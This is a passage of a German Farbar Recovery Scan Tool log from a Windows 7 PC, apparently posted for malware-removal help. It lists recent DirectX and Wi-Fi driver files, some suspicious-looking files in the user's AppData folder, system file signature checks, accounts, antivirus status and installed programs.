2017-02-13 19:37 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2017-02-13 19:37 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2017-02-13 19:37 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2017-02-13 19:37 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2017-02-13 19:37 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2017-02-13 19:37 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2017-02-13 19:37 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2017-02-13 19:37 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2017-02-13 19:37 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2017-02-13 19:37 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2017-02-13 19:37 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2017-02-13 19:37 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2017-02-13 19:37 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2017-02-13 19:37 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2017-02-13 19:37 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2017-02-13 19:37 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2017-02-13 19:37 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2017-02-13 19:37 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2017-02-13 19:37 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2017-02-13 19:37 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2017-02-13 19:37 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2017-02-13 19:37 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2017-02-13 19:37 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2017-02-13 19:37 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2017-02-13 19:37 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2017-02-13 19:37 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2017-02-13 19:37 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2017-02-13 19:37 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2017-02-13 19:37 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2017-02-13 19:37 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2017-02-13 19:37 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2017-02-13 19:37 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2017-02-13 19:37 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2017-02-13 19:37 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2017-02-13 19:37 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2017-02-13 19:37 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2017-02-13 19:37 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2017-02-13 19:37 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2017-02-13 19:37 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2017-02-13 19:37 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2017-02-13 19:37 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2017-02-13 19:37 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2017-02-13 19:37 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2017-02-13 19:37 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2017-02-13 19:37 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2017-02-13 19:37 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2017-02-13 19:37 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2017-02-13 19:37 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2017-02-13 19:37 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2017-02-13 19:37 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2017-02-13 19:37 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2017-02-13 19:37 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2017-02-13 19:37 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Windows\AVM_Driver
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Users\Dominik\AVM_Driver
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FRITZ!WLAN
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Program Files (x86)\avmwlanstick
2017-02-13 18:30 - 2015-10-01 02:00 - 02274336 _____ (AVM GmbH) C:\Windows\system32\Drivers\fwlanusb6_860.sys
2017-02-13 18:30 - 2015-10-01 02:00 - 00113656 _____ (AVM Berlin) C:\Windows\system32\fwlan6ci_860_28.dll
2017-02-13 18:30 - 2015-10-01 02:00 - 00079216 _____ C:\Windows\system32\Drivers\fwlanusb62.bin
2017-02-13 18:30 - 2015-10-01 02:00 - 00020954 _____ C:\Windows\system32\Drivers\fwlanusb62pa.bin
2017-02-13 18:30 - 2015-10-01 02:00 - 00014120 _____ (AVM Berlin) C:\Windows\system32\Drivers\avmeject.sys

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-03-11 15:25 - 2009-07-14 05:45 - 00022000 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-03-11 15:25 - 2009-07-14 05:45 - 00022000 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-03-11 15:20 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2017-03-11 15:18 - 2011-04-12 09:06 - 00699092 _____ C:\Windows\system32\perfh007.dat
2017-03-11 15:18 - 2011-04-12 09:06 - 00149232 _____ C:\Windows\system32\perfc007.dat
2017-03-11 15:18 - 2009-07-14 06:13 - 01619284 _____ C:\Windows\system32\PerfStringBackup.INI
2017-03-11 15:14 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-03-11 15:13 - 2016-09-17 18:04 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2017-03-09 21:11 - 2016-06-26 22:14 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Raptr
2017-03-09 21:10 - 2016-06-26 21:06 - 00000000 ____D C:\Users\Dominik
2017-03-09 21:09 - 2016-07-25 00:09 - 00000000 ____D C:\Windows\pss
2017-03-09 21:09 - 2016-07-04 08:14 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Mozilla
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\registration
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\AppCompat
2017-03-06 20:54 - 2016-07-04 04:19 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Adobe
2017-03-06 20:17 - 2016-06-26 21:56 - 00000000 ____D C:\Program Files (x86)\Google
2017-03-06 20:11 - 2009-07-14 05:45 - 00427728 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-06 20:06 - 2016-06-26 21:07 - 00001437 _____ C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-06 20:01 - 2011-04-12 09:21 - 00000000 ____D C:\Windows\ShellNew
2017-03-06 19:56 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-03-06 19:53 - 2016-06-26 21:41 - 00112320 _____ C:\Users\Dominik\AppData\Local\GDIPFONTCACHEV1.DAT
2017-03-06 19:51 - 2016-07-04 08:43 - 00002148 _____ C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-06 19:51 - 2016-07-04 08:43 - 00000000 ___RD C:\Users\Dominik\OneDrive
2017-03-06 19:47 - 2016-07-04 08:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-03-06 19:47 - 2009-07-14 04:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2017-02-25 19:01 - 2009-07-14 04:20 - 00000000 __RHD C:\Users\Public\Libraries
2017-02-23 22:43 - 2016-07-04 21:56 - 00000000 ____D C:\Windows\system32\MRT
2017-02-23 22:42 - 2016-07-04 21:56 - 138020592 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-02-19 15:07 - 2016-07-17 20:35 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-02-19 13:33 - 2016-06-26 22:17 - 00000000 ____D C:\Users\Dominik\AppData\Local\AMD
2017-02-19 13:32 - 2016-06-26 22:02 - 00000000 ____D C:\ProgramData\Package Cache
2017-02-13 20:10 - 2016-07-25 21:40 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\TS3Client
2017-02-13 18:47 - 2016-07-04 11:54 - 00000000 ____D C:\Users\Dominik\AppData\Local\Steam
2017-02-13 18:33 - 2016-06-26 21:41 - 00000000 ____D C:\Users\Dominik\AppData\Local\Google
2017-02-13 18:24 - 2009-07-14 06:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2017-02-12 18:16 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-03-06 19:56 - 2017-03-06 19:56 - 7288832 _____ () C:\Users\Dominik\AppData\Roaming\agent.dat
2017-03-06 19:59 - 2017-03-06 19:59 - 0023622 _____ () C:\Users\Dominik\AppData\Roaming\aliexpress.ico
2017-03-06 19:59 - 2017-03-06 19:59 - 0099678 _____ () C:\Users\Dominik\AppData\Roaming\booking.ico
2017-03-06 19:56 - 2017-03-06 19:56 - 0070752 _____ () C:\Users\Dominik\AppData\Roaming\Config.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 0278509 _____ () C:\Users\Dominik\AppData\Roaming\DALTRON.del
2017-03-06 19:56 - 2017-03-06 19:56 - 0278509 _____ () C:\Users\Dominik\AppData\Roaming\FAXMATCORE.del
2017-03-06 19:56 - 2017-03-06 19:56 - 0016272 _____ () C:\Users\Dominik\AppData\Roaming\InstallationConfiguration.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 0140288 _____ () C:\Users\Dominik\AppData\Roaming\Installer.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 0018432 _____ () C:\Users\Dominik\AppData\Roaming\Main.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 0005568 _____ () C:\Users\Dominik\AppData\Roaming\md.xml
2017-03-06 19:56 - 2017-03-06 19:56 - 0126464 _____ () C:\Users\Dominik\AppData\Roaming\noah.dat
2017-03-06 19:56 - 2017-03-06 19:56 - 1891621 _____ () C:\Users\Dominik\AppData\Roaming\Softdom.tst
2017-03-06 19:57 - 2017-03-06 19:57 - 0032038 _____ () C:\Users\Dominik\AppData\Roaming\uninstall_temp.ico
2016-06-26 21:31 - 2016-07-25 23:08 - 0007601 _____ () C:\Users\Dominik\AppData\Local\resmon.resmoncfg

Einige Dateien in TEMP:
====================
2016-07-04 08:14 - 2017-03-09 21:09 - 0000000 ____D () C:\Users\Dominik\AppData\Local\Temp\avgnt.exe

Einige mit null Byte Größe Dateien/Ordner:
==========================
C:\Windows\6952232240d0bd227f0ed883c0990089.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-03-11 14:57

==================== Ende von FRST.txt ============================

Addition:

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 11-03-2017
durchgeführt von Dominik (11-03-2017 16:40:14)
Gestartet von F:\Desktop
Windows 7 Enterprise Service Pack 1 (X64) (2016-06-26 20:06:52)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2822580911-2257060262-2848143123-500 - Administrator - Disabled)
Dominik (S-1-5-21-2822580911-2257060262-2848143123-1000 - Administrator - Enabled) => C:\Users\Dominik
Gast (S-1-5-21-2822580911-2257060262-2848143123-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 16.00 (x64) (HKLM\...\7-Zip) (Version: 16.00 - Igor Pavlov)
Active Directory Authentication Library für SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library für SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
AMD PRO Control Center (HKLM-x32\...\{BDFBDA0C-2525-4EF1-85F4-78CC66D4F878}) (Version: 1.0.0.833 - Advanced Micro Devices, Inc.)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.24.146 - Avira Operations GmbH & Co. KG)
Avira Browser Safety (HKLM-x32\...\{9E10EA90-5E97-43B7-A246-FC7B4F5E9493}) (Version: 1.4.5.509 - Avira Operations GmbH & Co KG)
Avira Connect (HKLM-x32\...\{845380e2-f0b5-4584-bc40-cc54345b3c06}) (Version: 1.2.77.41287 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.77.41287 - Avira Operations GmbH & Co. KG) Hidden
AVM FRITZ!WLAN (HKLM-x32\...\AVMWLANCLI) (Version: 06.20.07 - AVM Berlin)
Azure AD Authentication Connected Service (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.4.44.6257 - BlueStack Systems, Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
Catalyst Control Center Next Localization BR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
Devenv-Ressourcen für Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Dotfuscator and Analytics Community Edition 5.22.0 (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Dotfuscator and Analytics Community Edition Language Pack 5.22.0 de-DE (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
Erforderliche Komponenten für SSDT  (HKLM-x32\...\{2466E484-9D86-416B-9C88-AA533F15AF1C}) (Version: 12.0.2000.8 - Microsoft Corporation)
Erforderliche Komponenten für SSDT  (HKLM-x32\...\{FD639F4D-1460-42E6-B32D-FEC1745D0BDC}) (Version: 13.0.1601.5 - Microsoft Corporation)
Etron USB3.0 Host Controller (HKLM-x32\...\InstallShield_{DFBB738C-71D8-4DC5-B8D2-D65C37680E27}) (Version: 0.118 - Etron Technology)
Etron USB3.0 Host Controller (x32 Version: 0.118 - Etron Technology) Hidden
Fallout 4 (HKLM\...\Steam App 377160) (Version:  - Bethesda Game Studios)
FMW 1 (Version: 1.143.3 - AVG Technologies) Hidden
Gemeinsam genutzte Microsoft Azure-Komponenten für Visual Studio 2015 Sprachpaket – DEU - v1.8 (x32 Version: 1.8.40521.1 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (Deutsch) (HKLM-x32\...\{CBD7095F-7211-43FD-9FE7-FB08D753AF79}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (Deutsch) (HKLM-x32\...\{EE8BD24B-75E1-4BBF-86B9-91FE16ADE71C}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (Deutsch) (HKLM-x32\...\{529EFF09-750D-48B9-A47A-34A3B6248C3F}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
